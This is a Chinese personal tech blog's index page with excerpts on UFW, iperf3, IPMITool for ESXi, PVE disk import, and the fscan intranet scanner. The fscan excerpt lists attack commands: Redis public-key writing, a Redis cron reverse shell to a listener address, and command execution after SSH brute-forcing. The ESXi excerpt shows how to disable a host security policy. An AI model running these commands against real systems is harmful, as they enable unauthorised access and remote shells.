Ubuntu 的防火墙(UFW)及禁止 ICMP 协议

UFW 是 Ubuntu 中配置防火墙规则的前端,可简化防火墙的配置过程。 安装:如果没有安装可以通过 APT 来安装:apt-get install ufw 安装后查看 UFW 是否正常运行:ufw status如果状态是 inactive ,则未被激活。 启用 / 禁用 UFW:ufw enable // 启用 ufw disable // 禁用 使用:查看当前防火墙规则:ufw status verbose允许入站(allow):ufw allow http // 添加 HTTP 端口 ufw allow 2023/tcp // 仅添加 TCP 端口 ufw allow 2023/udp // 仅添加 UDP 端口 ufw allow 2021:2030 // 添加 2021 到 2030 间的端口 拒绝访问(deny):// 拒绝与允许方式相似删除规则:ufw delete allow http规则太多也可以列出规则序号来删除:ufw status numbered // 列出规则序号 ufw delete 1 // 删除第一条规则禁止 ICMP 协议:vim /etc/

技术 · 2023-05-02

Linux 下网络带宽、抖动、丢包测试(iperf3)

对于公网带宽测试,我们通常使用 speedtest,而对于局域网环境或者公网点对点情况下的带宽、抖动、丢包测试一般使用 iperf3。注意 iperf3 与 iperf2 是不兼容的,两者不可混搭测试。对于 Red Hat 系:yum -y install iperf3对于 Debian 系:sudo apt install iperf3 iperf3 作为服务端时默认情况下会使用 5201 端口,如果测试环境存在防火墙或者安全组,记得放行此端口。 快速使用:iperf3 -s // 作为服务端运行,默认使用 5201 端口 iperf3 -s -p 2023 // 作为服务端运行,指定使用 2023 端口 iperf3 -c <S_IP> // 作为客户端运行并对目标服务端进行打流测试 iperf3 -c <S_IP> -p 2023 -i 1 -t 20 -R //-i 指定报告间隔 //-t 指定传输时间(默认 10s) //-R 以反向模式运行(服务器发送,客户端接收) //-P 并行客户端流的数量 iperf3 -c <S_IP> -p

技术 · 2023-04-30

VMware ESXi 8.0 使用 IPMITool 工具

IPMITool 是一个用于控制服务器 IPMI 系统的开源工具,由于 ESXi 8.0 无法安装社区打包的 VIB 版本,所以需要手动编译二进制文件,再上传到 ESXi 使用。 使用 Ubuntu 18.04 编译:apt install gcc-multilib libc6-i386 libc6-dev-i386 wget wget https://github.com/ipmitool/ipmitool/archive/refs/tags/IPMITOOL_1_8_19.zip unzip IPMITOOL_1_8_19.zip cd ipmitool-IPMITOOL_1_8_19 ./configure CFLAGS=-m64 LDFLAGS=-static make 上传到 ESXi 8.0 后还需要手动允许第三方二进制文件才可以运行:esxcli system settings advanced set -o /User/execInstalledOnly -i 0 # 关闭安全策略 esxcli system settings advanced set -o /U

技术 · 2023-03-15

一款内网综合扫描工具(fscan)

机房网络中经常有客户会因为软件更新不及时导致存在安全漏洞而被有关部门警告,提前做好安全感知防患于未然。fscan 是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。简单用法:fscan.exe -h 192.168.1.1/24 (默认使用全部模块) fscan.exe -h 192.168.1.1/16 (B 段扫描) 其他用法:fscan.exe -h 192.168.1.1/24 -np -no -nopoc (跳过存活检测 、不保存文件、跳过 web poc 扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹 shell) fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行) fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块 ssh 和端口) fscan.exe -h 192.

技术 · 2023-01-29

PVE 虚拟机导入 vmdk 映像

把 vmdk 文件上传到 PVE 里,将 vmdk 转为 qcow2:qemu-img convert -O qcow2 test.vmdk test.qcow2使用 qm importdisk 命令导入:qm importdisk <vmid> <images-name> <storage pool> --format=<disk-fs> vmid:vm 的 id 例如 102 images-name:磁盘镜像的名字 storage poll: 存储磁盘镜像的位置,一般写存储的名称,如 pve01data disk-fs: 磁盘镜像格式 raw/vmdk/qcow2

技术 · 2023-01-04
2025 吕金鉴的主页. 版权所有
Theme Jasmine. 由 Cloudflare 提供 CDN 加速 ICP 20232321